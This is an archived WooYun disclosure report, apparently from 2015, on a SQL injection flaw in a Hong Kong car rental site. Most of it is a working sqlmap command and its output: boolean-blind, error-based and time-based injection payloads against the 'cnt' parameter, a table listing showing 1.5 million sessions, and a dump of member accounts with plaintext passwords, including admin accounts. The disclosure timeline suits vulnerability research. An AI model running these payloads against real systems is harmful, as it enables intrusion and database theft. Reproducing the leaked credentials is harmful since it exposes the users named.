乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
以 客 為 本 『至 誠 周 到、華 麗 顯 赫』是 皇 牌 旅 運 的 服 務 宗 旨。自 2004 年 成立 皇 牌 旅 運 有 限 公 司 以 來,憑 着 務 實 作 風,積 極 進 取,短 短數 年 間,逐 漸 得 到 租車服務業 界 認 同 和 顧 客 肯 定,客 戶 人 數 亦 不 斷 增 加。本租車公司 所 有 員 工 均 達 到 優質 服 務 及 專 業 水 平,足 以 解 决 所 有 汽 車 美 容 及 汽 車 租 賃上 之 問 題。為 求 提 昇 租 車 服 務 之 質 素,本 公 司 由 2011 年 7 月 起 已 遷 往 新 蒲 崗 大 有 街, 繼 續 提 供 客 戶 各 項 租 車 服 務, 把〝優 質 服 務〞邁 向 新 紀 元。
地址:http://**.**.**.**/lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm
python sqlmap.py -u "http://**.**.**.**/lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm" -p cnt --technique=BET --random-agent -D c1v -T member -C id,id_passwd,name,passwd,email,isadmin --dump --start 1 --stop 10
1. 154萬用戶session
web application technology: Nginx, PHP 5.3.28back-end DBMS: MySQL 5.1Database: c1v+-----------+---------+| Table | Entries |+-----------+---------+| `session` | 1541977 |
2. 用户邮箱密码
back-end DBMS: MySQL 5.1Database: c1v+-----------+---------+| Table | Entries |+-----------+---------+| member | 1268 |
Database: c1vTable: member[10 entries]+-----+-----------+----------------------+------------+---------------------------+---------+| id | id_passwd | name | passwd | email | isadmin |+-----+-----------+----------------------+------------+---------------------------+---------+| 1 | | | | uadmin | || 4 | | adm1 | adm1 | | 1 || 13 | | info@**.**.**.** | <blank> | info@**.**.**.** | 0 || 14 | | biken@**.**.**.** | <blank> | biken@**.**.**.** | 0 || 15 | | unittime@**.**.**.** | <blank> | unittime@**.**.**.** | 0 || 193 | | admin | admin | admin@**.**.**.** | 1 || 197 | | annielip1227 | 27121971 | annielip1227@**.**.**.** | 0 || 199 | | ilvrabbit | 811529 | aman@**.**.**.** | 0 || 200 | | CML0700365 | CML0700365 | poohissopoor@**.**.**.** | 0 || 201 | | cindy625 | 333999 | cindy625@**.**.**.** | 0 |+-----+-----------+----------------------+------------+---------------------------+---------+
available databases [1]:[*] c1vsqlmap resumed the following injection point(s) from stored session:---Parameter: cnt (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: o=multi&cnt=gethtm' AND 1895=1895 AND 'MieD'='MieD&file=images/20-30/20-30.htm Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: o=multi&cnt=gethtm' AND EXTRACTVALUE(1401,CONCAT(0x5c,0x717a6b6271,(SELECT (ELT(1401=1401,1))),0x7178766b71)) AND 'fJLg'='fJLg&file=images/20-30/20-30.htm Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: o=multi&cnt=gethtm' AND (SELECT * FROM (SELECT(SLEEP(5)))odXj) AND 'CVul'='CVul&file=images/20-30/20-30.htm---web application technology: Nginx, PHP 5.3.28back-end DBMS: MySQL 5.1sqlmap resumed the following injection point(s) from stored session:---Parameter: cnt (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: o=multi&cnt=gethtm' AND 1895=1895 AND 'MieD'='MieD&file=images/20-30/20-30.htm Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: o=multi&cnt=gethtm' AND EXTRACTVALUE(1401,CONCAT(0x5c,0x717a6b6271,(SELECT (ELT(1401=1401,1))),0x7178766b71)) AND 'fJLg'='fJLg&file=images/20-30/20-30.htm Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: o=multi&cnt=gethtm' AND (SELECT * FROM (SELECT(SLEEP(5)))odXj) AND 'CVul'='CVul&file=images/20-30/20-30.htm---web application technology: Nginx, PHP 5.3.28back-end DBMS: MySQL 5.1Database: c1v[10 tables]+----------+| session || album || article || category || currency || item || member || post || subject || topic |+----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: cnt (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: o=multi&cnt=gethtm' AND 1895=1895 AND 'MieD'='MieD&file=images/20-30/20-30.htm Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: o=multi&cnt=gethtm' AND EXTRACTVALUE(1401,CONCAT(0x5c,0x717a6b6271,(SELECT (ELT(1401=1401,1))),0x7178766b71)) AND 'fJLg'='fJLg&file=images/20-30/20-30.htm Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: o=multi&cnt=gethtm' AND (SELECT * FROM (SELECT(SLEEP(5)))odXj) AND 'CVul'='CVul&file=images/20-30/20-30.htm---web application technology: Nginx, PHP 5.3.28back-end DBMS: MySQL 5.1Database: c1v+-----------+---------+| Table | Entries |+-----------+---------+| `session` | 1541977 || item | 8172 || article | 1445 || member | 1268 || category | 346 || subject | 11 || currency | 4 || topic | 3 || post | 2 || album | 1 |+-----------+---------+
Database: c1vTable: member[8 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| data | non-numeric || email | non-numeric || id | numeric || id_passwd | numeric || isadmin | numeric || name | non-numeric || passwd | non-numeric || vid | numeric |+-----------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: cnt (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: o=multi&cnt=gethtm' AND 1895=1895 AND 'MieD'='MieD&file=images/20-30/20-30.htm Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: o=multi&cnt=gethtm' AND EXTRACTVALUE(1401,CONCAT(0x5c,0x717a6b6271,(SELECT (ELT(1401=1401,1))),0x7178766b71)) AND 'fJLg'='fJLg&file=images/20-30/20-30.htm Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: o=multi&cnt=gethtm' AND (SELECT * FROM (SELECT(SLEEP(5)))odXj) AND 'CVul'='CVul&file=images/20-30/20-30.htm---web application technology: Nginx, PHP 5.3.28back-end DBMS: MySQL 5.1Database: c1vTable: member[10 entries]+-----+-----------+----------------------+------------+---------------------------+---------+| id | id_passwd | name | passwd | email | isadmin |+-----+-----------+----------------------+------------+---------------------------+---------+| 1 | | | | uadmin | || 4 | | adm1 | adm1 | | 1 || 13 | | info@**.**.**.** | <blank> | info@**.**.**.** | 0 || 14 | | biken@**.**.**.** | <blank> | biken@**.**.**.** | 0 || 15 | | unittime@**.**.**.** | <blank> | unittime@**.**.**.** | 0 || 193 | | admin | admin | admin@**.**.**.** | 1 || 197 | | annielip1227 | 27121971 | annielip1227@**.**.**.** | 0 || 199 | | ilvrabbit | 811529 | aman@**.**.**.** | 0 || 200 | | CML0700365 | CML0700365 | poohissopoor@**.**.**.** | 0 || 201 | | cindy625 | 333999 | cindy625@**.**.**.** | 0 |+-----+-----------+----------------------+------------+---------------------------+---------+
上WAF。
危害等级:中
漏洞Rank:6
确认时间:2015-11-20 15:09
Referred to related parties.
暂无